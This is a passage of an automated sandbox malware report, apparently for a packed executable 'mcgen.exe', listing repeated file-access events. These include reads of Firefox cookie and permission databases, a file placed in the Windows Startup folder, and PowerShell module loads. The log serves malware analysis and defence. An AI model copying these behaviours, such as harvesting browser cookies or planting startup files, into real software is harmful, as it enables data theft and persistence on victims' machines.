              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
